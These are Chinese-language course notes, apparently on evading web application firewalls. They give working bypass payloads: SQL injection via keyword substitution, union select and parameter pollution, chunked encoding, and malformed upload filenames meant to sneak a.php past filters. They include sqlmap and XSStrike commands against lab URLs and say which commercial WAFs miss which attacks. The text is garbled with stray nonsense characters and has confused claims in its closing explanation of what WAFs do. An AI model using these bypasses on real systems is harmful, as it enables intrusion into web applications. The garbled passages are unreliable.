2-WAF主要过滤方式及绕过(HPP污染&分块传输&垃圾数据)

1、速度流量问题

2、工具的指纹被识别

3、工具的检测Poc或Payload

1、SQL注入&文件上传绕过

2、XSS跨站&其他漏洞绕过

3、HPP污染&垃圾数据&分块等

SQL注入 https://www.cnblogs.com/cute-puli/p/11146625.html

关键字替换

http://192.168.0.100:8081/sqlilabs/Less-2/?id=1 like 1

http://192.168.0.100:8081/sqlilabs/Less-2/?id=1 like 12

更换提交方式：

POST id=-1 union select 1,2,3--+

模拟文件上传 传递数据

分块传输：更改数据请求格式

https://github.com/c0ny1/chunked-coding-converter

HPP参数污染：裤慎态id=1/* &id=-1%20union%20select%201,2,3%23 /

文件上传：换行解析&垃圾溢出&%00干扰&=符号干扰&参数模拟

filename=a.php

filename="a.php

filename="a.php%00"

垃圾数据filename="a.php"

无限filenamefilename="a.php"

filename=="a.php"

filename="name='uploadfile.php"

filename="Content-Disposition: form-data.php"

filename=="a.ph

p"

python sqlmap.py -u " http://test.xiaodi8.com/pikachu/vul/sqli/sqli_str.php?name=*&submit=%E6%9F%A5%E8%AF%A2 " --random-agent --tamper= rdog.py --proxy=" http://tps118.kdlapi.com:15818 "

格式替换

https://github.com/s0md3v/XSStrike

python xsstrike.py -u " http://test.xiaodi8.com/pikachu/vul/xss/xss_reflected_get.php?message=1&submit=submit " --proxy

txt= y)&submit=%E6%8F%90%E4%BA%A4

文件包含：没什么好说的就这几种

..\ ..../ ...\等

安孝轿全狗：

注入 xss 文件上传拦截

rce 文件包含 等其他不拦截

宝塔：

注入 上传拦截

rce 文件包含 xss等其他不拦截

其中拦截的是关键字

aliyun

拦截的CC速度 和 后门 信息收胡源集和权限维持阶段拦截

漏洞利用 他不拦截 默认的版本（升级版本没测试）

WAF PHP环境 JAVA不支持

waf的迅袜功能是什么？WAF可以防范的攻击有哪些？接下来让我们一起看一下。

一、WAF功能

waf的功能是什么？是通过过滤HTTP/HTTPS的协议流浪，针对Web应用进行安全核实，防止CC攻击，从而保护应用能裤昌首够使用和更快速安全可靠的使用，并且防止来自Web的攻击。

CC攻击：采用访问Web数据库造成大量的资源消耗，从而导致服务器拒绝访问的一种手段，主要就是访问一些资源消耗大的应用来造成线程池满盈。不能够在进行处理请求。

二、相较于传统安全设备的优点

自身具备感知威胁的威胁的能力，提前间个威胁胡数给阻断掉，具备高性能的HTTP/HTTPS的深度检测能力，检测率非常的准确，在复杂的网络环境下也能够保证自身的稳定和准确性。

三、WAF可以防范的攻击

1、HTTP协议的合规性

保证所访问点的HTTP遵循HTTP协议合规，一旦发现了有问题的HTTP点进行访问，会立即的阻断，保证自身的安全性，这也是常用于国家与国家间网络的一道大墙。

2、SQL注入阻断

对来非来自于自身的捆绑与HTTP之中注入进行阻挡，防止传入到数据库之中，造成对数据库信息的提取，造成本身的信息安全威胁。

3、跨站点脚本/CSRF攻击防护

阻止来三方应用采用Cookie的读取，甚至是加入恶意脚本，一旦是允许访问，网页之中的图片和按钮等中药展示和使用功能遭到欧怀，并且造成金钱和数据的算是。

4、DDos的攻击防护

能够有效地阻止DDoS的攻击，造成网页崩溃。

5、防扫描器探测攻击

加强了自身的安全性，在众多扫描漏洞的探测器面前很好的隐藏自己，防止他们对自己进行攻击。

四、WAF透明代理的关键技术

WAF实现的关键技术在在于其头民代理技术，这是基于TCP连接而实现的，使用网络协议栈应用层代理技术，从而实现了刻画短和服务器双向且独立的TCP连接。将客户端和服务器直接隔开，只有通过了WAF之后，才会被传入到服务器之中，保证了访问的安全性。

---